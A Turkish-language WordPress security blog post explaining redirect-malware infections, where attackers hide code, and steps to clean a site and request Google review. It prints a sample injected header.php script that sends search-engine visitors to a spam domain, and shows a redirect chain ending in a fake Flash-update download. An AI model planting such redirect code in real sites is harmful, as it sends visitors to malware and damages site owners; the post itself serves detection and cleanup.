WordPress Malware Redirect Hack  Nasıl Tespit Edilir ve Düzeltilir

WordPress Siteniz Sizi Spamlı Bir Siteye Mi Yönlendiriyor?

Kimse sitelerinin hacklenmesine karşı %100 güvende değildir(Hatta FBI ‘ın siteleri bile hackleniyor J ).Hacklenmek yaygın bir durumdur ve aynı zamanda web site sahipleri için en yıkıcı deneyimlerden biridir.

Bu hackerlar sitenizden para, veri ve gizli bilgiler alabilirler. Eğer herhangi bir durumda siteniz spam niteliğinde bir siteye yönleniyorsa sonuçlar için hazır olun.

Evet, tabi ki Google kendi itibarıyla alakalı hiçbir şansı göze almayacaktır ve Google tarafından bir ceza alacaksınız. Belki de Google tarafından kara listeye ekleneceksiniz. Bu yüzden sitenizin spam niteliğinde bir siteye yönlendirildiğini gördüğünüzde  ne yapacağınızı bilmek oldukça önemlidir.

 

WordPress Redirect Hack Nedir?

Genel kullanım şekliyle WordPress Malware Redirect” ya da “WordPress Redirect Hack” sitenize gelen ziyaretçilerin otomatik olarak spam niteliğindeki sitelere yönlendiği hack biçimidir. Bu büyük ihtimalle WorpPress sitenizin veri tabanına yerleştirilen kodlardan meydana geliyordur. Bu kodlar sitenizin spam niteliğinde ki site ya da sitelere yönlendirilmesine yol açar.

Genellikle spam niteliğindeki WordPress yönlendirmesi bir ziyaretçinin gitmek istediği sayfa dışında bir sayfaya yönlendirildiği zaman  sitenin görünen yüzü sayesinde tespit edilir. Çoğu durumda hackerlar sitenize zarar vermek ve popülerliğini tehlikeye atmak için sitenizi +18 ya da illegal sitelere yönlendirmek amacıyla bir script kullanırlar.

Hackerların web sitenin yönlendirilmesini değiştirmek için kullandıkları en yaygın yöntemler şunlardır;

·         Kendilerini web sitenize ghost admin (Gizli Yönetici) olarak ekleyebilirler

·         WordPress sitenize kötü amaçlı bir kod parçacığı ekleyebilirler.

·         Sitenizde .php kodu çalıştırabilirler.

 

Eğer hackerlar tarafından spam niteliğinde bir script eklenmişse bu scripti genellikle sitenizde WordPress ‘in bir ana dizin dosyası olarak gözükmesi için doğal bir isimlendirme yaparlar. Hackerlar spam niteliğinde ki dosya ya da kodları wp-content/plugins , wp-content/uploads dosyalarına , .htaccess, wp-includes, wp-content/themes ve ya  wp-config.php dosyasına eklerler.

 

WordPress Sitenize Yerleştirilmiş Birkaç Spam Niteliğindeki Kod Örnekleri

Eğer web sitenize spam niteliğinde yönlendirmeler yapılmış ise bu kodu tespit etmek için aşağıdaki alanları kontrol edin;

  • Sitenizin Ana Dizin Dosyaları
  • php
  • html
  • .htaccess dosyası
  • Tema Dosyaları
  • header.php (tema dosyaları içerisinde)
  • footer.php (tema dosyaları içerisinde)
  • functions.php (tema dosyaları içerisinde)

 

Spam niteliğinde ki kodların var olduğunun en belirgin kanıtı hacklenmiş WordPress sitenize gelen kullanıcıların spam niteliğinde ki sitelere yönlendirilmesidir.

 

Header.php Dosyası İçerisine Spam Kodu Yerleştirilmesi

Genel olarak 10-12 satırlık spam niteliğindeki kod WordPress sitenizin header.php dosyasının içerisine yerleştirilir.

header.php içerisine spam niteliğindeki kodun eklenmesi

 

Bu kod çözümlendiği zaman spam niteliğindeki yazılımın ana kod yapısı aşağıdaki gibi görünür;

 

spam niteliğindeki kodun temizlenmesi

 

Bu kodun arkasında bir mantık vardır.Basitçe ziyaretçileri default7.com adresine yönlendirir.

 

Eğer bu ilk ziyaret ise yeniden gelen ziyaretçileri izlemek için 896diC9OFnqeAcKGN7fW  isimli cookieyi kurar.

 

·         Tema içerisindeki header.php alanına yerleştirilen spam niteliğindeki kod

 

echo'<script>var s = document.referrer;if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 || s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {  self.location = \'http://yee****boost**750***sale*.com/\';}</script > '; ?>

 

Tarayıcıya ve IP adresine bağlı olarak bir kullanıcı aşağıda yer alan sitelerin birine yönlendirilir;

  • test0 .com
  • distinctfestive .com
  • default7 .com
  • ableoccassion .com
  • test246 .com
  • 404.php

Spam Niteliğindeki Kod İçerisindeki Hatalar

Bu spam niteliğindeki kodlarının farklı etkileri de vardır. Bu etkiler spam niteliğindeki kod içerisinde yer alan birkaç belli hatadan kaynaklanır.

Örneğin düzenlenmiş kod içerisindeki 9. Satıra bakın;

if ($_GET[‘6FoNxbvo73BHOjhxokW3‘] !== NULL) {

Spam niteliğindeki kod 6FoNxbvo73BHOjhxokW3 parametresini kontrol eder. Genel olarak kod içersindeki GET sorgusu bunu içeriyorsa bir şey yapamaz.Problem şudur; kod değerini kontrol etmeden bu parametrenin var olup olmadığından emin olamaz. PHP kodları da şu şekilde bir bildirim verir;

Notice: Undefined index: 6FoNxbvo73BHOjhxokW3 in /home/account/public_html/wp-content/themes/currenttheme/header.php(8) : eval()’d code on line 9

Internet Explorer Kullanıcıları İçin Sahte Güncellemeler

ınternet explorer kullanıcıları için sahte güncelleme

 

 

Internet Explorer kullandığınız zaman garip olan durum şudur, yönlendirme sırası aşağıdaki gibi görünür;

 

default7 .com
-> advertisementexample .com/d/p/test246.com?k=e88965c228fb1da3ff5ecff0d3034e7a.1462363771.823.1&r=
-> maintainpc .soft2update .xyz/vtrescs?tyercv=5qe5FetFrItyco5HNTadzxMu9Nwdv__MlK_dmzyotoo.&subid=102860_bebd063b36f47778fce4592efccae37a&v_id=e5tsIAwpqr6ffJ2kShbqE1F3WXTIU4auGIx7jpVqifk.
-> intva31 .saturnlibrary .info/dl-pure/1202331/31254524/?bc=1202331&checksum=31254524&ephemeral=1&filename=adobe_flash_player.exe&cb=-1388370582&hash

 

Bu kodda web sitelerinin ekranlarına sahte Java ya da Flash güncellemelerini vermesine neden olur.

WordPress Redirect Hack Nasıl Tespit Edilir ve Temizlenir?

Hack durumunu düzeltmeden önce yapılması gereken işlemler şu şekildedir;

WordPress Redirect Hack ‘i düzeltmeden önce sitenin geçici bir süreliğine offline olduğundan emin olun. Bunu yaparak problemi çözmeniz için yeterli zamanınız olduğundan ve aynı zamanda kullanıcılarınızı hacklenen sayfalardan uzak tuttuğunuzdan emin olabilirsiniz.

Ana dizin dosyalarında ve web sitenizin veri tabanında değişiklik yaparken yedekleme aldığınızdan emin olun.Yedekleme aynı zamanda hacklenen sayfaları da içermeli ve herhangi bir içerik yanlışlıkla silinirse o sayfayı referans olarak kullanabilirsiniz. Aynı zamanda çalıştığınız bütün dosyaların kopyasının olduğundan emin olun.

Web sitenizde yer alan JavaScript, CMS ya da PHP dosyaları hakkında bilginiz yok ise, bu problemi çözmek için profesyonel bir destek almanız şiddetle tavsiye edilir.

Web sitenizde yer alan spam niteliğindeki kodları temizlemek için aşağıda yer alan 5 adımlık basit rehberi takip edin;

Web Sitenizi Tarayın

Sitenizi kontrol etmek için pek çok yol bulunmaktadır ve eğer sitenizin spam niteliğinde bir kod ile hacklendiğini fark ederseniz, sitenizin tamamının yedeğini almanız gerekmektedir. WordPress sitenizden spam niteliğindeki kodu silerken hata yapabilirsiniz ve bu durumda aldığınız yedek sizi kurtaracaktır. Bütün sitenizin yedeğini aldığınız zaman WorpPress Malware Scanner ‘i kullanarak sitenizi taratmaya hazır hale gelirsiniz.

Spam Niteliğindeki Kodu Tespit Etmek

Web sitenizdeki spam niteliğindeki kodu bulmak için pek çok yer vardır. Web sitenizin her sayfasındaki kodların satır satır taranmasının kolay olmadığını hepimiz biliyoruz. Bu kodun sunucunuzda bir alanda gizlendiği zamanlarda olur. Ve bazı alanlar için spam niteliğindeki kodu temizleme işlemini başlatmak için ftp/ftps erişimine ihtiyacınız vardır.

Eğer web siteniz gizli bir web sitesine yönlendiriliyorsa spam niteliğindeki kodu şu dosyalarda arayın;

  • php ve index.html dosyalarını kontrol edin!
  • .htaccess dosyası

 

Eğer web siteniz ziyaretçileri indirme işlemine yönlendiriyorsa aşağıdaki dosyaları kontrol edin;

  • header.php
  • footer.php
  • index.php ve index.html dosyaları
  • Tema dosyaları

 

Web Sitenizde Daha Derinlere İnmek

Bazı zamanlarda sitenize spam niteliğinde kodların bulaşıp bulaşmadığını kontrol etmek için test yapmanın bir zararı yoktur. Bunun için Google Bot Simulator aracını kullanabilir, User Agent ya da Google Botu gibi davranarak bu testleri yapabilirsiniz ve ya sitenizin Search Console hesabı üzerinden URL Denetleme aracını kullanabilirsiniz. SSH client yolu ile çalışan birkaç komut bulunmaktadır. Belli bir kodu kullanarak hacklenmenin gerçekleştiği alana bakabilirsiniz ve spam niteliğindeki kodlarını manuel olarak silebilirsiniz.

Spam Niteliğindeki Kodu Silmek

Kötü amaçlı sitelere yönlendirilmeyi gerçekleştirem spam niteliğindeki kodu silmeniz gerekmektedir. Yeni sayfalardaki spam niteliğindeki kodları sitenizin Search Console hesabı üzerinden URL Kaldırma aracını kullanarak Google arama sonuçlarından sayfanızı kaldırabilirsiniz. Aynı zamanda eklentilerinizi ve temanızı güncellemeyi ihmal etmeyin. Kullandığını temanın en güncel sürümünü kullandığınızdan emin olun. Düzenli aralıklarla şifrelerinizi güncelleyin.

Google’a  Search Console’u Kullanarak Spam Niteliğindeki Kodu Tekrardan Değerlendirmesi İçin İstekte Bulunun

 Google Search Console site yöneticileri için en iyi ve ücretsiz araçlardan birisidir. Eğer sitenizi Google Search Console ‘a kaydetmediyseniz siteniz ile ilgili pek çok can alıcı ve kritik bilgiyi kaçırdığınızı belirtmek isteriz.  Google Search Console ‘u kullanarak spam niteliğindeki kodları gözden geçirmeniz için aşağıda yer alan rehberi takip edebilirsiniz;

  • Google Search Console’a Giriş Yapın
  • Sitenizin sahibi olduğunuz onaylayın
  • Site > Yönetim Paneli > Güvenlik Hataları adımlarını izleyin

Burada Google’ın tarafınıza verdiği spam niteliğindeki kodların bulaşmış olabileceği sayfa adreslerinizi bulabilirsiniz. Bütün hacklenen dosyaları temizlediğinizde siteniz spam niteliğindeki kodlardan arınacaktır. Basitçe gözden geçirme isteği butonuna tıklayın ve spam niteliğindeki kodları temizlemek için izlediğiniz adımları not şeklinde ekleyin.

search console üzerinden kötü yazılım değerlendirme isteği

 

Sitenizi Bu Kötü Amaçlı Yönlendirmelerden Nasıl Korursunuz?

Aşağıda listelenen adımları takip ederek WordPress sitenizi daha güvenli hale getirmeniz önemlidir. Adımlar ise;

    • WordPress ana dizin kodlarınızın güncel olduğundan emin olun.
    • Güvenli WordPress Sunucu servisini kullanarak sitenizin sadece depolanmasını değil yönetilmesini de yapabilirsiniz.
    • Eklenti ve temanız güncel olmalıdır.
    • Sitenizde aktif olarak kullanmadığınız eklenti ve temaları silin.
    • İki adımlı doğrulama kullanın ve en az iki yönetici hesabı oluşturun.
Ozan Soğukpınar
Ozan Soğukpınar
4 Nisan 2019, 12:09